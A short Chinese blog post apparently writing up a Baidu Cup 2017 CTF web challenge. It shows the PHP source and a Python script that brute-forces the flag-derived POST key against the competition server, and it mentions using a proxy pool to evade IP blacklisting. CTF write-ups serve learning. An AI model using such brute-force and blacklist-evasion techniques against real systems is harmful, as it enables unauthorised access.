iloveflag-blog

百度杯2017年春秋欢乐赛

字数统计: 213阅读时长: 1 min
2018/10/14 Share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
header(“content-type:text/html;charset=utf-8”);
show_source(__FILE__);
echo ‘<pre>’;
include(‘u/ip.php’);
include(‘flag.php’);
if (in_array($_SERVER[‘REMOTE_ADDR’],$ip)){
die(“您的ip已进入系统黑名单”);
}
var_dump($ip);

if ($_POST[substr($flag,5,3)]==’attack’){
echo $flag;
}else if (count($_POST)>0){
$ip = ‘$ip[]=”‘.$_SERVER[‘REMOTE_ADDR’].'”;’.PHP_EOL;
file_put_contents(‘u/ip.php’,$ip,FILE_APPEND);
}

echo ‘</pre>’;
array(0) {
}

POST的数据要为$flag的第6位到第9位,一般flag是flag{xxx12321}
且数据为attack
一次post最多为1000个数据

1
2
3
4
5
6
7
8
9
10
11
import requests
url="http://a47333e7d9d743a0b5951d2de698e921d1a1820fde514c99.game.ichunqiu.com/"
s='0123456789abcdef'
data={}
for i in s:
for j in s:
for k in s[3:6]:
data[i+j+k]='attack'
print(data)
r=requests.post(url,data=data)
print(r.text)

我发现重置容器后,flag会变….要开代理池,或者看运气
我只跑出来一次,自闭了…

CATALOG